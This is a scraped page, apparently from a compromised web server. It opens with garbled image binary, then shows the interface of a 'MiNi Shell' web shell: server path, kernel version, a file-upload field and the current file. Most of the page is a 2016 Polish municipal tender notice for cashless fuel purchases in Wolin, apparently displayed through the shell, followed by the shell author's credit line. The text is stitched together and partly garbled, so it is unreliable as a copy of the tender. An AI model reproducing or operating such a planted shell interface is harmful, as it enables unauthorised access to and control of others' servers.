JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/127393-N-2016.html

<p class="kh_header"><b>Wolin: Bezgotówkowy  zakup paliw płynnych i produktów pozapaliwowych 
  do samochodów  służbowych  Gminy  Wolin i jej jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 127393 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wolin reprezentowana przez Burmistrza Wolina , ul. Zamkowa 23, 72-510 Wolin, woj. zachodniopomorskie, tel. 091 3261322, 3220809, faks 091 3261333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowy  zakup paliw płynnych i produktów pozapaliwowych 
  do samochodów  służbowych  Gminy  Wolin i jej jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest : bezgotówkowy zakup  paliw płynnych (benzyny  bezołowiowej 95, oleju napędowego do samochodów i urządzeń/sprzętu z silnikami spalinowymi  będących  w dyspozycji  Referatu  Gospodarczego  Urzędu Miejskiego w Wolinie, Jednostek Ochotniczej  Straży Pożarnej  Gminy  Wolin i  Ośrodka Sportu  i Rekreacji  w Wolinie, zgodnych z  wymogami zawartymi w Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz .U. z 2015 r. poz. 1680), Polskich Normach PN-EN ISO 4259-2009, EN 590:2009 + A1:2010, EN 228:2008,  aprobatami  europejskimi, świadectwem jakości .

 2.  Przewidywane  łącze ilości paliw, objęte przedmiotem zamówienia : 
- benzyna bezołowiowa PB-95 -  17 225   litrów  
- olej napędowy.  - 50 599  litrów  
 - produkty pozapaliwowe: oleje silnikowe, płyny eksploatacyjne oraz kosmetyki samochodowe itp. - według potrzeb Zamawiającego 

3.  Przewidywane  ilości   paliw,  do zakupu  w trakcie obowiązywania umowy  (  36  miesięcy  od daty podpisania umowy ) przez poszczególne  jednostki/ płatników, które będą stronami umowy :  

3.1  Gmina Wolin  dla potrzeb  Referatu Gospodarczego  i Ochotniczych Straży Pożarnych  
-     benzyna  bezołowiowa PB-95- 15  225  litrów      
-     olej napędowy  - 43 999   litrów                  
-   produkty pozapaliwowe: :  oleje silnikowe, płyny eksploatacyjne oraz kosmetyki samochodowe itp. - według potrzeb 

3.2  Ośrodek Sportu i Rekreacji w Wolinie, ul. Mostowa 1, 72-510 Wolin  
-  benzyna bezołowiowa  PB-95  2 000 litrów    
-  olej napędowy  -  6 600  litrów 
 - produkty pozapaliwowe:   oleje silnikowe, płyny eksploatacyjne oraz kosmetyki samochodowe itp. - wg potrzeb 

Wspólny Słownik Zamówień: 
09134100-8 - olej napędowy
09132100-4 - benzyna bezołowiowa
09211100-2 - oleje silnikowe 
39831500-1 - samochodowe środki czystości 

4. Zasady  realizacji przedmiotu zamówienia : 
1) Dostawa/zakup  paliw i produktów pozapaliwowych będzie  realizowana sukcesywnie  na zasadzie dokonywania bezgotówkowych tankowań do samochodów i urządzeń/ sprzętu z silnikami spalinowymi będących w dyspozycji  jednostek organizacyjnych Zamawiającego:   Referatu  Gospodarczego  Urzędu Miejskiego w Wolinie   i  Jednostek OSP  Gminy  Wolin  i  Ośrodka  Sportu i Rekreacji w Wolinie na  stacjach paliw Wykonawcy. 
2) Rozliczenie należności między stronami  za  dostawę - zakup  paliwa następować będzie w obrocie bezgotówkowym, przelewami bankowymi na konto wskazane w umowie.  
3) Łączna  przewidywana  przez Zamawiającego  ilość kart paliwowych : 13   przypisanych do samochodu oraz 8 kart na okaziciela.  
4) Zamawiający  przekaże  Wykonawcy  w dniu  podpisania umowy :
- nr  rejestracyjne  pojazdów, 
- wykaz imienny  kierowców , którzy upoważnieni  będą do tankowania paliwa .
   5)   Zakup przedmiotu zamówienia odbywać się będzie na stacjach paliw Wykonawcy sukcesywnie i wg potrzeb Zamawiającego, po cenach jednostkowych obowiązujących w dniu tankowania z uwzględnieniem udzielonego upustu . 
    6) Wykonawca musi dysponować minimum 1 stacją paliw czynną całodobowo i przez wszystkie dni tygodnia  w granicach miasta Wolin lub  oddaloną  od siedziby Zamawiającego  w promieniu nie większym niż 3 km. 
    7)  Zamawiający będzie dokonywał zakupu  w granicach miasta Wolina  lub na stacji  oddalonej  nie więcej niż 3 km od siedziby  Zamawiającego.  Zamawiający przewiduje również przypadki tankowania samochodów na terenie całej Polski.
    8)	Wykonawca zobowiązany jest zapewnić Zamawiającemu możliwość tankowania samochodów Zamawiającego na każdej ze swoich stacji.
    9) Zamawiający wymaga wystawienia kart paliwowych, zapewniających bezgotówkowy zakup paliwa: 13 kart  przypisanych do numeru rejestracyjnego pojazdów  oraz 8 kart  na okaziciela (6 kart  dla  poszczególnych jednostek  OSP i  2  karty  na okaziciela  do tankowania paliwa dla potrzeb  urządzeń gospodarczych : kosiarka, odśnieżarka itp.). Zamawiający dopuszcza zastosowanie innej formy rozliczeń bezgotówkowych za zakup paliwa. 
    10) W przypadku zastosowania kart paliwowych, powinny one spełniać bankowe standardy zabezpieczeń i być  zabezpieczone poufnym kodem identyfikacyjnym PIN, który będzie znany tylko ich użytkownikom.
    11) W przypadku zastosowania kart paliwowych, Zamawiający wymaga załączenia do  oferty wniosku o wydanie i użytkowanie kart do bezgotówkowego zakupu paliwa.
   12) Zamawiający będzie rozliczał się z Wykonawcą zbiorczymi fakturami wystawionymi dwa razy w miesiącu. Wykonawca załączy do faktury rozliczenie zawierające sumę wszystkich tankowanych rodzajów paliw z rozbiciem dla każdego samochodu Zamawiającego z podaniem dat tankowania oraz obowiązujących w tych dniach cen paliw, pomniejszonych o udzielony upust  dla każdego rodzaju paliwa. Termin płatności 21 dni od daty  sprzedaży.  
   13). Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie  - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie  określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza , że Zamawiający dopuszcza złożenie ofert w tej części przedmiotu zamówienia o  równoważnych parametrach technicznych, eksploatacyjnych  i użytkowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-4, 09.13.21.00-8, 09.21.11.00-2, 39.83.15.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest posiadanie uprawnień do prowadzenia działalności gospodarczej w zakresie obrotu paliwami ciekłymi  na terenie RP tj.  posiadanie aktualnej  koncesji  na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi na terenie RP. 
Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą :
1.	oświadczenia 
2.  aktualnej  koncesji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>z uwagi  na charakter zamówienia Zamawiający  nie wyznacza szczegółowego warunku w tym zakresie.
 Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą  oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  minimum 1 stacją paliw czynną całodobowo i przez wszystkie dni tygodnia na terenie m. Wolin, lub oddaloną  od siedziby Zamawiającego  w promieniu nie większym niż 3 km. 
                   Na potwierdzenie w/wym. warunku Wykonawca załączy wykaz stacji paliw, z wykorzystaniem wzoru - Załącznik nr  6 do SIWZ.
              Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą :
1.	oświadczenia
2.	 wykazu stacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>z uwagi  na charakter zamówienia Zamawiający  nie wyznacza szczegółowego warunku w tym zakresie.
 Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą  oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>z uwagi  na charakter zamówienia Zamawiający  nie wyznacza szczegółowego warunku w tym zakresie.
 Ocena spełnienia warunku  nastąpi według  formuły  spełnia- nie spełnia  na podstawie dostarczonego wraz z ofertą  oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Jeżeli Wykonawca przy realizacji przedmiotu zamówienia będzie polegał na wiedzy i doświadczeniu, potencjale  technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi on udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór wg Załącznika nr 8 do SIWZ lub inny dokument, z którego takie zobowiązanie wynika np. umowa, itp.) oraz odpowiednie dokumenty określone w pkt  III.4.1.   (wykaz stacji). Wykaz stacji musi być podpisany przez Wykonawcę .  
2    Podmiot, który zobowiązał się do udostępnienia Wykonawcy zasobów, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. 
3  Pisemne zobowiązanie, o którym mowa w pkt 1 musi być podpisane przez osobę / osoby uprawnioną/e do  reprezentowania podmiotu użyczającego zasoby. Do oferty należy załączyć dokument, z którego takie  upoważnienie będzie wynikało. 
4  Jeżeli Wykonawca, wykazując spełnianie warunku wiedzy i doświadczenia,  polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, podmioty te traktowane są jako podmioty, które będą brały udział w realizacji zamówienia.   Zobowiązanie   powinno  zawierać  wyraźne nawiązanie  do uczestnictwa  tego podmiotu w wykonaniu zamówienia. Powyższe uczestnictwo, w dowolnej, dozwolonej przez prawo postaci (np. podwykonawca , czy  innej  podstawie), musi  jednak zostać wykazane przez Wykonawcę w ofercie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 10</li>
<li>2 - Wysokość  upustu - 90</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje następujące zmiany w umowie: zmianę przedmiotu zamówienia (zmianę ilości zakupionych paliw) i terminu obowiązywania umowy w następujących przypadkach:
-	w przypadku likwidacji producenta, dystrybutora lub gwaranta,
-	w przypadku zmian obowiązujących przepisów prawa w zakresie mającym wpływ na realizację 
                               zamówienia,
-	      w przypadku zaistnienia siły wyższej,
-	z przyczyn organizacyjnych ze strony Zamawiającego, w tym w strukturze organizacyjnej,
-	z przyczyn wynikających ze specyfiki działalności Zamawiającego.
2.	W przypadku zmiany:
-  stawki podatku od towarów i usług,
           -  wysokości minimalnego wynagrodzenia za pracę, ustalonego na podstawie art. 2 ust. 3-5 ustawy z
              dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
-	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
wynagrodzenie, o którym mowa w umowie, może ulec zmianie, o ile przed wystawieniem faktury Wykonawca udokumentuje wpływ tych zmian na koszty wykonania zamówienia oraz uzyska pisemną akceptację Zamawiającego na zmianę wysokości wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.bip.wolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wolinie, ul. Zamkowa 23. 72-510 Wolin , pkó 105 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2016 godzina 11:00, miejsce: Urząd  Miejski  w  Wolinie, ul. Zamkowa  23,  72-510 Wolin,   pokój nr  12  Biuro Obsługi Interesanta ( parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com